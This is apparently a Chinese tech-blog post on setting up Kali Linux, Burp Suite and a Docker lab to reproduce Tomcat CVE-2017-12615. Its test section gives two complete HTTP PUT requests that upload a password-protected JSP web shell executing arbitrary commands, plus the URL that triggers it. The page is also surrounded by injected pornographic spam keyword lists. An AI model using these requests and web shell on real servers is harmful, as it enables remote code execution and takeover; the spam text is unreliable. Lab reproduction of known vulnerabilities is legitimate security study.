<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      kali系統(tǒng)安裝和CVE-2017-12615測(cè)試

      1 安裝kali系統(tǒng)

      1.1 下載VMware壓縮包

      kali-linux-2022.1
      默認(rèn)的用戶和密碼是kali

      1.2 初始化系統(tǒng)

      sudo apt update -y  #kali
      sudo apt install -y sogoupinyin fcitx
      sudo dpkg-reconfigure locales #添加[x] zh_CN.UTF-8 UTF-8
      sudo reboot
      

      1.3 安裝docker

      vim /etc/apt/sources.list.d/docker.list 
      deb [arch=amd64] https://download.docker.com/linux/debian buster stable
      
      sudo apt update -y 
      sudo apt install -y docker-ce
      

      1.4 安裝docker-compse

      sudo apt install -y docker-compose
      

      2 配置burp代理

      2.1 在應(yīng)用程序那里找到burpite
      2.2 proxy->options中添加代理
      2.3 瀏覽器->添加proxy中寫(xiě)burp開(kāi)啟的代理
      2.4 瀏覽器添加burp的證書(shū)

      3 配置CVE-2017-12615環(huán)境

      sudo docker run -it -p 8080:8080 cved/cve-2017-12615 bash  #kali
      root@cac77cc04871:/usr/local/tomcat# bin/catalina.sh start
      #這里暫時(shí)不要關(guān)閉窗口
      

      4 測(cè)試

      先用瀏覽器訪問(wèn)

      firefox http://127.0.0.1:8080
      

      在brup中找到http proyx中找歷史信息,確認(rèn)代理是否生效
      然后打開(kāi)brup的repeater編輯request

      PUT /1.jsp::$DATA  HTTP/1.1
      
      Host: 192.168.144.128:8080
      
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
      
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      
      Accept-Encoding: gzip, deflate
      
      DNT: 1
      
      Connection: close
      
      Upgrade-Insecure-Requests: 1
      
      Content-Length: 659
      
      
      
      <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
      
      +"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
      -------------------------------------------------------------------------------------------------------
      PUT /2.jsp/ HTTP/1.1
      
      Host: 192.168.144.128:8080
      
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
      
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      
      Accept-Encoding: gzip, deflate
      
      DNT: 1
      
      Connection: close
      
      Upgrade-Insecure-Requests: 1
      
      Content-Length: 664
      
      
      
      <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
      
      +"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
      

      發(fā)送請(qǐng)求

      http://127.0.0.1:8080/2.jsp?cmd=whoami&password=023  #正常就返回系統(tǒng)用戶了
      
      posted @ 2022-05-09 14:08  聽(tīng)_風(fēng)~  閱讀(261)  評(píng)論(0)    收藏  舉報(bào)
      主站蜘蛛池模板: 人妻va精品va欧美va| 色爱综合另类图片av| 无码av免费毛片一区二区| 久久精品国产亚洲av品| 国产精品国三级国产专区| 最新的国产成人精品2022| 国产熟妇另类久久久久久| 久久久久国产精品熟女影院| 国产中文一区卡二区不卡| 麻豆国产成人AV在线播放| 富平县| 精品人妻中文字幕av| 亚洲av永久无码精品网站| 门头沟区| 中文字幕日韩有码国产| 日韩中文字幕v亚洲中文字幕| 日韩人妻无码精品久久| 精品国产亚洲av麻豆特色| 伊人久久大香线蕉AV网| 国产亚洲另类无码专区| 张掖市| 94人妻少妇偷人精品| 日本精品极品视频在线| 亚洲夂夂婷婷色拍WW47| 亚洲中文字幕有综合久久| 久久人人妻人人爽人人爽| 亚洲综合在线亚洲优优色| 河北省| 强奷漂亮人妻系列老师| 18禁无遮拦无码国产在线播放| 免费观看的AV毛片的网站不卡| 成人特黄特色毛片免费看| 国产一区二区三区导航| 久久国内精品一区二区三区| 久久精品国产亚洲av麻豆长发| 欧美视频网站www色| 国产成人精品一区二区无| 又爽又黄又无遮挡的激情视频| 国产精品av中文字幕| 久久综合给合久久狠狠狠| 人妻无码|